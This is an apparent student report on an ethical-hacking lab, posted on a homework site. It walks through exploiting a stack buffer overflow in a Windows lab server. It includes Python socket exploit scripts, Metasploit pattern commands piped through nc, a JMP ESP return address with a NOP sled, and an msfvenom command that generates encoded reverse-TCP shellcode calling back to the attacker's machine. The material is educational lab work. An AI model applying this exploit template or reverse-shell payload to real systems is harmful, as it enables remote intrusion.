Report on ICT Ethical Hacking: Exploit Development and Analysis

Verified

Added on 2023/06/04

AI Summary

This report provides a detailed walkthrough of the exploit development process within the context of ICT ethical hacking. It begins with preparation steps involving Kali and Win32 buffer victim virtual machines, ensuring proper network configuration and IP address verification. The report then covers finding the overflow by using Immunity Debugger and crafting a Python script to trigger a buffer overflow. Weaponizing the vulnerability involves identifying the EIP offset and determining an address for code execution. Finally, the report details the development of shellcode using Metasploit, including generating reverse TCP shellcode and integrating it into the exploit script to achieve remote code execution. This document is for educational purposes and demonstrates the stages involved in identifying and exploiting vulnerabilities in a controlled environment.

Running head: ICT ETHICAL HACKING
ICT ETHICAL HACKING
Name of the Student
Name of the university
Author Note

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.

Exploit development is a critical process which take advantages of a vulnerability or bugs
in order to cause unanticipated or unintended behavior in the software or hardware. Frequently, it
is used to gaining control of a computer system, allowing privilege escalation or a denial of
service attack. The whole development process has been categorized in certain phases. The
exploit development process is followed:
Preparation:
First, Kali virtual machine was opened and then enter into Win32 buffer victim virtual
machine. Before starting any process, it is need to ensure that both virtual machines are set to
NAT networking. Then the IP address on both machines are need to be checked.
1. Open Kali virtual machine
2. Open Win32 Buffer Victim virtual machine
3. Ensure both are set to NAT networking
4. Check the IP addresses on both
Finding the Overflow:
In the next phase, immunity debugger needs to open on the windows host. Then the
server.exe was loaded in immunity debugger. Then we entered the execution phase by pressing
F9 key. Then a new file had been created with the name “attack.py” in the kali. This files
contains python codes which are followed:
#!/usr/bin/python #Hashbang or shebang
import sys #System-specific parameters and
functions.
import os # using operating system dependent
functionality

import socket #connect nodes to a network
host = sys.argv[1] #open the file which is using first argument
port = int(sys.argv[2])
# Testing
buffer = "\x41"*500
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
Then the command “python attack.py IP_ADDRESS 1337”. The IP address is the address of
the windows virtual machine. Then we swap to the Windows environment and press shift+F9 to pass
the exception to the executable.

We can see that EIP now contains our value, as does EBP. Whilst ESP points to a region of
memory which contains our injected value.
Weaponzing the vulnerability:
In this phase, server.exe was restarted by pressing CTRL + F2 within immunity debugger.
Then the execution process was initiated by pressing F9. The directory also needs to be change
into metasploit by running running cd /usr/share/metasploit-framework/tools/exploit. Run
./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337 within Kali, where IP_ADDRESS is the IP address of the
Windows VM. Then press SHIFT +F9 within Immunity debugger to pass the exception. Run
“./pattern_offset.rb -l 5000 -q 37694136” within Kali to determine the offset of EIP. Now we must
determine an address for code which will jump to ESP. The attack.py modified as follows:
1. #!/usr/bin/python
2. import sys
3. import os
4. import socket
5.

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.

6. host = sys.argv[1]
7. port = int(sys.argv[2])
8.
9. # EIP is overwritten at 260 bytes
10. buffer = "\x41"*260
11.
12. # Overwrite EIP with JMP ESP
13. buffer += "\x78\x16\xF3\x77"
14.
15. # NOPSLED
16. buffer += "\x90"*128
17.
18. # Shellcode
19. buffer +=
20.
21. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
22. con = s.connect((host, port))
23. s.send(buffer)
24. s.close()
Developing Shellcode:
1. Enter Kali.

2. Run the command msfvenom -p windows/shell/reverse_tcp LHOST=<KALI_IP> -e
x86/shikata_ga_nai -b '\x00\xff\x0a\x0b\x0d' -i 3 -f python where <KALI_IP> is the IP
address of the Kali virtual machine.
3. Modify the attack.py file to include the generated shellcode.

1 out of 6

Report on ICT Ethical Hacking: Exploit Development and Analysis

Secure Best Marks with AI Grader

Secure Best Marks with AI Grader

Related Documents

ECU CSI5208 Ethical Hacking: Exploit Development Technical Outline

ICT Ethical Hacking: Exploit Development, Vulnerability Analysis

Exploit Development Workshop: Analyzing Vulnerabilities in Windows XP

CSI3508: Ethical Hacking & Defence - Exploit Development Workshop 6

+13062052269

info@desklib.com